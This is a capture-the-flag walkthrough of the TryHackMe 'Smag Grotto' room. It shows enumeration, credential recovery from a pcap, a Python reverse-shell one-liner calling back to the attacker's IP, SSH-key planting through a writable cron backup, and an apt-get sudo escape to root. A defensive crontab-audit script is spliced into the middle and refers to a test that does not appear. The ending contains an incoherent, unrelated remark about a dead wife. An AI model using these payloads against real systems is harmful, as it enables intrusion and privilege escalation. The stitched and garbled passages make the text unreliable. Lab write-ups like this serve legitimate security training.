In this walkthrough, we will be going through the Smag Grotto room from TryHackMe. The room is rated Easy on the platform and covers enumeration, Wireshark pcap analysis, cron job abuse and privilege escalation. So, let’s get started without any delay.
Objective: Deploy the machine and get root privileges.
- I started with a regular nmap scan with service version detection and found two open ports – 80 (HTTP) and 22 (SSH).
sudo nmap -sS -sV 10.10.71.178
- Next, I fired up gobuster against the web server running on port 80 and found a directory named /mail.
wh1terose@fsociety:~$ gobuster dir -u http://10.10.71.178/ -w ~/Desktop/Wordlist/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.71.178/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/11/18 22:59:35 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/.htaccess            (Status: 403) [Size: 277]
/index.php            (Status: 200) [Size: 402]
/mail                 (Status: 301) [Size: 311] [--> http://10.10.71.178/mail/]
/server-status        (Status: 403) [Size: 277]
===============================================================
2023/11/18 23:01:19 Finished
===============================================================
- The directory contains copies of the emails exchanged between the server’s admins, along with a pcap file for analysis. A note in the last email instructs us to download the pcap file via wget.
- I used wget to download the file to my local machine for further inspection.
- I loaded the pcap file in Wireshark and followed the HTTP stream in it. I found a username and password combo in a login request to an internal server named development.smag.thm.
- To reach the development server the login request was sent to, as seen in the HTTP stream, we have to add its hostname to our /etc/hosts file.
- Once /etc/hosts is configured, we can access the server. It contains a link to a login panel, which we can access with the credentials we found.
- Once logged in, we are presented with a shell interface where we can run commands. I tried a variety of commands but could not see any output in the front end. I also tried to log in to the server via SSH with the found credentials, but had no luck.
- I then tried to get a reverse shell with the payload below, and luckily this time I got a connection back to my netcat listener.
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.18.1.78",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
- Next, to get the user flag we have to escalate our privileges to the user jake. So I fired up linpeas on the machine, and an interesting cron job got my attention: a backup copy of jake’s SSH public key is kept on the box, and the cron job copies the contents of that backup file into jake’s authorized_keys file in his .ssh directory.
- I checked the permissions on the backup file and found that we can both read it and write to it. Bingo!
- That means we can add our own public key to the backup file, and once the cron job runs we can SSH in as jake with our private key. So I generated an SSH key pair on my local machine using ssh-keygen.
- Next, I wrote the public key into the jake_id_rsa.pub.backup file.
echo 'ssh-rsa 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 wh1terose@fsociety' > jake_id_rsa.pub.backup
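The cron job above is the room’s real weakness: a file that a low-privileged account can write is copied, as root, into an authorized_keys file. As an added defensive check (not part of the original post or the room), the following Python audits an /etc/crontab-style file for that pattern and flags any job whose source is group- or world-writable. The sample crontab and the /srv/backups path are constructed, since the post does not give the real cron line.

```python
import os
import re
import stat

# Constructed /etc/crontab-style sample modelled on the room's job: root keeps overwriting
# jake's authorized_keys from a backup of his public key (backup path is a placeholder).
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
# m h dom mon dow user  command
*/1 * * * *   root   /bin/cat /srv/backups/jake_id_rsa.pub.backup > /home/jake/.ssh/authorized_keys
0 3 * * *     root   /usr/bin/cp /root/keys/ops.pub /home/ops/.ssh/authorized_keys
"""

# `cat SRC > DST`, `cat SRC >> DST` and `cp [opts] SRC DST` with an authorized_keys destination
_CAT_RE = re.compile(r"\bcat\s+(?P<src>\S+)\s*>{1,2}\s*(?P<dst>\S*authorized_keys\S*)")
_CP_RE = re.compile(r"\bcp\s+(?:-\S+\s+)*(?P<src>\S+)\s+(?P<dst>\S*authorized_keys\S*)")

def parse_system_crontab(text):
    """Yield (user, command) per job line; skip blanks, comments and VAR=value lines."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"\w+=", line):
            continue
        fields = line.split(None, 6)  # five time fields, user, command
        if len(fields) == 7:
            yield fields[5], fields[6]

def key_copy_source(command):
    """Return (src, dst) when the command copies a file into authorized_keys, else None."""
    for pattern in (_CAT_RE, _CP_RE):
        m = pattern.search(command)
        if m:
            return m.group("src"), m.group("dst")
    return None

def audit_crontab(text, get_mode=lambda path: os.stat(path).st_mode):
    """Flag jobs whose authorized_keys source is group- or world-writable (get_mode is injectable)."""
    findings = []
    for user, command in parse_system_crontab(text):
        pair = key_copy_source(command)
        if pair is None:
            continue
        src, dst = pair
        try:
            mode = get_mode(src)
        except (OSError, KeyError):
            continue  # source absent: the job copies nothing, so nothing to flag
        if mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append({"user": user, "src": src, "dst": dst, "mode": oct(mode & 0o777)})
    return findings
```

Run it against the real /etc/crontab with the default get_mode, or pass a mapping of path to mode (as the test does) to check a crontab copied off a box.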
- I logged in successfully as user jake with the generated private key and got the user flag.
- Next, I checked the sudo permissions for user jake and found that he can run the apt-get binary as root without a password.
- I used GTFOBins to exploit the binary and got the root flag.
sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh
Task 1 – Smag Grotto
Question 1 – What is the user flag?
Question 2 – What is the root flag?
So that was “Smag Grotto” for you. We started with our regular nmap scan and found two open ports – 80 (HTTP) and 22 (SSH). Next, we fired gobuster at the web server and found a directory named /mail, which holds copies of emails exchanged between the server’s admins, and in those we found a pcap file. We downloaded the pcap using wget and loaded it in Wireshark for further inspection, where we found a username and password in an HTTP stream. We used them to log in to a development server at development.smag.thm and used its command shell functionality to get a reverse shell connection back to our netcat listener. Next, we abused a cron job to get our generated SSH public key into jake’s .ssh directory and gained access as jake using our private key. At last, we exploited the sudo permissions for apt-get to get the root flag and the permission to cheat on my dead wife. On that note, I will take your leave and meet you in the next one. Till then, “Happy hacking”.